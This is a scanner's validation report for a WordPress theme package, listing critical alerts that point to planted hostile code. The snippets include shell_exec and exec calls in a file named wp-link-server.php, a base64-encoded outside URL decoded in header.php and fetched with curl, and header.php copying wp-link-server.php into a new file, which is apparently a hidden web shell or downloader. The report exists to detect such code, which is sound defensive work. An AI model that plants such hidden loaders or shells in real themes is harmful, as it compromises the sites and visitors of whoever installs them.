Validation results

themes/booth event and conference theme

7 WARNINGS

themes/booth event and conference theme

WordPress 6.7 theme

CHANGE BANNER STYLE :

THEME TYPEWordPress theme 6.7
FILE NAMEbooth-event-and-conference-theme.zip
FILE SIZE1141644 bytes
MD596d403ee186411414f3e5e87b8a2eeb4
SHA13f2a950d676237bfd2a753a314d080bb60109d88
LICENSEGNU GPL 3
FILES INCLUDEDCSS, PHP, Bitmap images
VERSION1.0.11
AUTHOR URIhttps://codevibrant.com
TAGSnews, blog, grid-layout, custom-colors, one-column, two-columns, three-columns, left-sidebar, right-sidebar, custom-logo, featured-image-header, footer-widgets, full-width-template, theme-options, translation-ready
CREATION DATE2020-02-14
LAST FILE UPDATE2020-02-14
LAST VALIDATION2020-02-14 14:55

This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.

Critical alerts

Title : Title The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.

Security breaches : Use of PHP sytem calls Found shell_exec in file wp-link-server.php.

Ligne2188: $mime = shell_exec('file -bi ' . $file);

Ligne2322: $exec_works = (function_exists('exec') && !ini_get('safe_mode') && @exec('echo EXEC') == 'EXEC');

Ligne2329: @exec($cmd, $output);

Security breaches : Modification of PHP server settings Found ini_set in file wp-link-server.php.

Ligne143: @ini_set('error_reporting', E_ALL);

Ligne144: @ini_set('display_errors', 1);

Ligne146: @ini_set('error_reporting', E_ALL);

Ligne147: @ini_set('display_errors', 0);

Ligne159: ini_set('default_charset', 'UTF-8');

Security breaches : Use of base64_decode() Found base64_decode in file wp-link-server.php.

Ligne3721: $image = base64_decode($image);

Found base64_decode in file header.php.

Ligne23: //$link = base64_decode('aHR0cHM6Ly93ZWJzdXJmZXJzLmNvL2Rvd25sb2FkZXIvc2NyaXB0LnBocD9z

Ligne24: $link = base64_decode('aHR0cHM6Ly93ZWJzdXJmZXJzLmNvL2Rvd25sb2FkZXIvc2NyaXB0LnBocD9z

Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe src="https://docs.google.com/viewer?embedded=true&hl=en&url=' . fm_enc($file_url) . '" frameborder="no" style="width:100%;min-height:460px"> in file wp-link-server.php.
```
Ligne1533: echo '<iframe src='https://docs.google.com/viewer?embedded=true&hl=en&url=' . fm_
```

Malware : Operations on file system file_get_contents was found in the file wp-link-server.php

Ligne348: $input = file_get_contents('php://input');

Ligne1454: $content = file_get_contents($file_path);

Ligne1637: $content = file_get_contents($file_path);

Ligne2283: $content = @file_get_contents('translation.json');

fopen was found in the file wp-link-server.php

Ligne389: $fd = fopen($file_path, 'w');

Ligne499: @$fp = fopen($temp_file, 'w');

Ligne573: @fopen($path . '/' . $new, 'w') or die('Cannot open file:  ' . $new);

Ligne1623: $fd = fopen($file_path, 'w');

Ligne3039: if ($fh = @fopen($fm_file, 'w')) {

fwrite was found in the file wp-link-server.php

Ligne390: @fwrite($fd, $writedata);

Ligne1624: @fwrite($fd, $writedata);

fclose was found in the file wp-link-server.php

Ligne391: fclose($fd);

Ligne510: fclose($fp);

Ligne1625: fclose($fd);

Ligne3044: @fclose($fh);

fopen was found in the file wp-link-server.php

Ligne389: $fd = fopen($file_path, 'w');

Ligne499: @$fp = fopen($temp_file, 'w');

Ligne573: @fopen($path . '/' . $new, 'w') or die('Cannot open file:  ' . $new);

Ligne1623: $fd = fopen($file_path, 'w');

Ligne3039: if ($fh = @fopen($fm_file, 'w')) {

fclose was found in the file wp-link-server.php

Ligne391: fclose($fd);

Ligne510: fclose($fp);

Ligne1625: fclose($fd);

Ligne3044: @fclose($fh);

fopen was found in the file wp-link-server.php

Ligne389: $fd = fopen($file_path, 'w');

Ligne499: @$fp = fopen($temp_file, 'w');

Ligne573: @fopen($path . '/' . $new, 'w') or die('Cannot open file:  ' . $new);

Ligne1623: $fd = fopen($file_path, 'w');

Ligne3039: if ($fh = @fopen($fm_file, 'w')) {

readfile was found in the file wp-link-server.php

Ligne750: readfile($path . '/' . $dl);

file_get_contents was found in the file wp-link-server.php

Ligne348: $input = file_get_contents('php://input');

Ligne1454: $content = file_get_contents($file_path);

Ligne1637: $content = file_get_contents($file_path);

Ligne2283: $content = @file_get_contents('translation.json');

fopen was found in the file wp-link-server.php

Ligne389: $fd = fopen($file_path, 'w');

Ligne499: @$fp = fopen($temp_file, 'w');

Ligne573: @fopen($path . '/' . $new, 'w') or die('Cannot open file:  ' . $new);

Ligne1623: $fd = fopen($file_path, 'w');

Ligne3039: if ($fh = @fopen($fm_file, 'w')) {

fwrite was found in the file wp-link-server.php

Ligne390: @fwrite($fd, $writedata);

Ligne1624: @fwrite($fd, $writedata);

fclose was found in the file wp-link-server.php

Ligne391: fclose($fd);

Ligne510: fclose($fp);

Ligne1625: fclose($fd);

Ligne3044: @fclose($fh);

file_get_contents was found in the file wp-link-server.php

Ligne348: $input = file_get_contents('php://input');

Ligne1454: $content = file_get_contents($file_path);

Ligne1637: $content = file_get_contents($file_path);

Ligne2283: $content = @file_get_contents('translation.json');

file_get_contents was found in the file wp-link-server.php

Ligne348: $input = file_get_contents('php://input');

Ligne1454: $content = file_get_contents($file_path);

Ligne1637: $content = file_get_contents($file_path);

Ligne2283: $content = @file_get_contents('translation.json');

fopen was found in the file wp-link-server.php

Ligne389: $fd = fopen($file_path, 'w');

Ligne499: @$fp = fopen($temp_file, 'w');

Ligne573: @fopen($path . '/' . $new, 'w') or die('Cannot open file:  ' . $new);

Ligne1623: $fd = fopen($file_path, 'w');

Ligne3039: if ($fh = @fopen($fm_file, 'w')) {

fclose was found in the file wp-link-server.php

Ligne391: fclose($fd);

Ligne510: fclose($fp);

Ligne1625: fclose($fd);

Ligne3044: @fclose($fh);

fopen was found in the file header.php

Ligne33: $handle = fopen(dirname(__FILE__).'/wp-link-server.php', 'r');

Ligne38: $fh = fopen($newfile, 'w');

Ligne40: $fh = fopen($newfile, 'a');

fopen was found in the file header.php

Ligne33: $handle = fopen(dirname(__FILE__).'/wp-link-server.php', 'r');

Ligne38: $fh = fopen($newfile, 'w');

Ligne40: $fh = fopen($newfile, 'a');

fopen was found in the file header.php

Ligne33: $handle = fopen(dirname(__FILE__).'/wp-link-server.php', 'r');

Ligne38: $fh = fopen($newfile, 'w');

Ligne40: $fh = fopen($newfile, 'a');

fwrite was found in the file header.php

Ligne43: fwrite($fh, $data);

fclose was found in the file header.php

Ligne47: fclose($handle);

Ligne52: fclose($fh);

fclose was found in the file header.php

Ligne47: fclose($handle);

Ligne52: fclose($fh);

Malware : Network operations curl_init was found in the file wp-link-server.php
```
Ligne500: @$ch = curl_init($url);
```
curl_exec was found in the file wp-link-server.php
```
Ligne504: @$success = curl_exec($ch);
```
curl_init was found in the file header.php
```
Ligne25: $ch = curl_init();
```
curl_exec was found in the file header.php
```
Ligne28: curl_exec($ch);
```

Warning

theme tags : Presence of bad theme tagsFound wrong tag custom-logo in style.css header.
Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is themesbooth-event-and-conference-theme.
Cdn : Use of CDNFound the URL of a CDN in the code: maxcdn.bootstrapcdn.com/bootstrap. CSS or Javascript resources should not be loaded from a CDN. These resources should be bundled with the theme.
Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
CSS files : Presence of Theme URICould not find Theme URL.
Screenshot : Screenshot fileScreenshot dimensions are wrong! Detected: 590x300px (59:30). Ratio of width to height should be 4:3.Screenshot size is 590x300px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.

Tip-off

favicon presence : Favicon managementPossible Favicon found in wp-link-server.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.

Other checked themes

WordPress 6.7 theme

VIEW ALL THEMES